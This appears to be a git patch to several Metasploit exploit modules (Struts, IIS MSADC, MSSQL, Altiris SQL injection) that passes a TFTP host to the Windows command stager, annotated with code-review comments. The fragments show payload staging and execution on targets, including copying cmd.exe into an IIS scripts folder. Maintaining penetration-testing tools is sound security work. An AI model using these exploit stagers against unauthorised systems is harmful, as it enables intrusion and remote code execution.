From bbbec267b6a543f37f26ed9450876e7eb33588fc Mon Sep 17 00:00:00 2001
From: bcoles
Date: Wed, 29 Jun 2022 19:10:52 +1000
Subject: [PATCH] exploits: Set tftphost option for modules which use Windows TFTP stager
---
 modules/exploits/multi/http/struts_code_exec.rb | 3 ++-
 .../multi/http/struts_code_exec_exception_delegator.rb | 3 ++-
 modules/exploits/windows/antivirus/ams_xfr.rb | 7 ++-----
 .../windows/http/ca_totaldefense_regeneratereports.rb | 3 ++-
 modules/exploits/windows/http/osb_uname_jlist.rb | 4 ++--
 modules/exploits/windows/iis/msadc.rb | 3 ++-
 modules/exploits/windows/misc/altiris_ds_sqli.rb | 3 ++-
 modules/exploits/windows/mssql/mssql_payload.rb | 4 ++--
 8 files changed, 16 insertions(+), 14 deletions(-)
diff --git a/modules/exploits/multi/http/struts_code_exec.rb b/modules/exploits/multi/http/struts_code_exec.rb
index 1caa28f051..42605e379b 100644
--- a/modules/exploits/multi/http/struts_code_exec.rb
+++ b/modules/exploits/multi/http/struts_code_exec.rb
@@ -91,7 +91,8 @@ class MetasploitModule < Msf::Exploit::Remote
   def windows_stager
     print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
-    execute_cmdstager({ :temp => '.' })
+    tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+    execute_cmdstager({ temp: '.', tftphost: tftphost })
     @payload_exe = generate_payload_exe
     print_status("Attempting to execute the payload...")
diff --git a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb
index fe1185bcab..6f079a988f 100644
--- a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb
+++ b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb
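Review bot: The new `tftphost` line calls `Rex::Socket.source_address` with no destination, so when SRVHOST is the wildcard the source interface is chosen against the library's default probe destination rather than against the host being targeted; `Rex::Socket.source_address(datastore['RHOST'])` resolves the interface that is actually routable to that host. The identical line is pasted into all eight hunks (struts_code_exec_exception_delegator, ams_xfr, ca_totaldefense_regeneratereports, osb_uname_jlist, msadc, altiris_ds_sqli and mssql_payload repeat it), so a single shared helper would keep eight copies from drifting apart. The comparison also only matches `0.0.0.0`, so an IPv6 wildcard bind of `::` would be handed to the stager unchanged. `windows_stager` continues past the end of the hunk.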
@@ -106,7 +106,8 @@ class MetasploitModule < Msf::Exploit::Remote
     exe_fname = rand_text_alphanumeric(4 + rand(4)) + ".exe"
     print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
-    execute_cmdstager({ :temp => '.' })
+    tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+    execute_cmdstager({ temp: '.', tftphost: tftphost })
     @payload_exe = generate_payload_exe
     print_status("Attempting to execute the payload...")
diff --git a/modules/exploits/windows/antivirus/ams_xfr.rb b/modules/exploits/windows/antivirus/ams_xfr.rb
index eb70eeaf43..d725040973 100644
--- a/modules/exploits/windows/antivirus/ams_xfr.rb
+++ b/modules/exploits/windows/antivirus/ams_xfr.rb
@@ -50,16 +50,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
   def windows_stager
-
-    exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
-
     print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
-    execute_cmdstager({ :temp => '.', :cgifname => exe_fname })
+    tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+    execute_cmdstager({ temp: '.', tftphost: tftphost })
     @payload_exe = generate_payload_exe
     print_status("Attempting to execute the payload...")
     execute_command(@payload_exe)
-
   end
   def execute_command(cmd, opts = {})
diff --git a/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb b/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb
index 59f70e4efb..39018f8ed8 100644
--- a/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb
+++ b/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb
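Review bot: The ams_xfr hunk does more than the subject states: it also removes the `exe_fname` local and the `:cgifname => exe_fname` option, so the stager now chooses the name of the dropped executable itself, and that behaviour change is not recorded in the commit message. If `exe_fname` is still referenced elsewhere in the class — the rest of it, including `execute_command`, lies outside the hunk — deleting the local here would leave a dangling reference, so that is worth confirming before merge. Either restore `cgifname: exe_fname` in the new call or state in the message why the custom file name is no longer needed.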
@@ -53,7 +53,8 @@ class MetasploitModule < Msf::Exploit::Remote
   def windows_stager
     print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
-    execute_cmdstager({ :temp => '.' })
+    tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+    execute_cmdstager({ temp: '.', tftphost: tftphost })
     @payload_exe = generate_payload_exe
     print_status("Attempting to execute the payload...")
diff --git a/modules/exploits/windows/http/osb_uname_jlist.rb b/modules/exploits/windows/http/osb_uname_jlist.rb
index 755a462a59..d6d88994e9 100644
--- a/modules/exploits/windows/http/osb_uname_jlist.rb
+++ b/modules/exploits/windows/http/osb_uname_jlist.rb
@@ -54,12 +54,12 @@ class MetasploitModule < Msf::Exploit::Remote
   def windows_stager
     print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
-    execute_cmdstager({ :temp => '.' })
+    tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+    execute_cmdstager({ temp: '.', tftphost: tftphost })
     @payload_exe = generate_payload_exe
     print_status("Attempting to execute the payload...")
     execute_command(@payload_exe)
-
   end
   def execute_command(cmd, opts = {})
diff --git a/modules/exploits/windows/iis/msadc.rb b/modules/exploits/windows/iis/msadc.rb
index 78fa2ca2d4..df77aaa776 100644
--- a/modules/exploits/windows/iis/msadc.rb
+++ b/modules/exploits/windows/iis/msadc.rb
@@ -344,7 +344,8 @@ class MetasploitModule < Msf::Exploit::Remote
     res = exec_cmd(y, "cmd /c copy cmd.exe \\inetpub\\scripts\\#{exe_fname}", z)
     # Use the CMD stager to get a payload running
-    execute_cmdstager({ :temp => '.', :linemax => 1400, :cgifname => exe_fname })
+    tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+    execute_cmdstager({ temp: '.', tftphost: tftphost, linemax: 1_400, cgifname: exe_fname, noconcat: true })
     # Save these file names for later deletion
     @exe_cmd_copy = exe_fname
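Review bot: In the msadc hunk, `noconcat: true` is a new stager option that neither the commit subject nor the `# Use the CMD stager to get a payload running` comment above it explains, and it presumably changes how the stager emits its command lines rather than only where the payload is fetched from. A one-line addition such as `# noconcat: this command channel needs one command per request` would record the intent — with the actual reason filled in, since nothing in the hunk shows it. The `1400` to `1_400` change on the same line is cosmetic and fine. The enclosing method continues outside the hunk.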
diff --git a/modules/exploits/windows/misc/altiris_ds_sqli.rb b/modules/exploits/windows/misc/altiris_ds_sqli.rb
index 15813d5f86..dd92c9bfb1 100644
--- a/modules/exploits/windows/misc/altiris_ds_sqli.rb
+++ b/modules/exploits/windows/misc/altiris_ds_sqli.rb
@@ -173,7 +173,8 @@ Processor-Speed=#{processor_speed}
     # CmdStagerVBS was tested here as well, however delivery took roughly
     # 30 minutes and required sending almost 350 notification messages.
     # size constraint requirement for SQLi is: linemax => 393
-    execute_cmdstager({ :delay => 1.5, :temp => '%TEMP%\\', :flavor => :tftp })
+    tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+    execute_cmdstager({ delay: 1.5, tftphost: tftphost, temp: '%TEMP%\\', flavor: :tftp })
   end
   def on_new_session(client)
diff --git a/modules/exploits/windows/mssql/mssql_payload.rb b/modules/exploits/windows/mssql/mssql_payload.rb
index 628d44656f..cc3226876d 100644
--- a/modules/exploits/windows/mssql/mssql_payload.rb
+++ b/modules/exploits/windows/mssql/mssql_payload.rb
@@ -99,8 +99,8 @@ class MetasploitModule < Msf::Exploit::Remote
     method = datastore['METHOD'].downcase
     if (method =~ /^cmd/)
-      execute_cmdstager({ :linemax => 1500, :nodelete => true })
-      #execute_cmdstager({ :linemax => 1500 })
+      tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+      execute_cmdstager({ linemax: 1500, tftphost: tftphost, nodelete: true })
     else
       # Generate the EXE, this is the same no matter what delivery mechanism we use
       exe = generate_payload_exe
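Review bot: The rewritten `execute_cmdstager` call in altiris_ds_sqli still passes no `linemax:` even though the comment directly above it says `# size constraint requirement for SQLi is: linemax => 393`, so the comment and the call disagree; either pass `linemax: 393` in the new options hash or reword the comment so it no longer reads as a requirement the call honours. This hunk passes `flavor: :tftp` explicitly while the other seven rely on the module's configured flavor, which is fine but worth a check that each of those modules really selects the TFTP stager as the subject asserts. The enclosing method starts before the hunk.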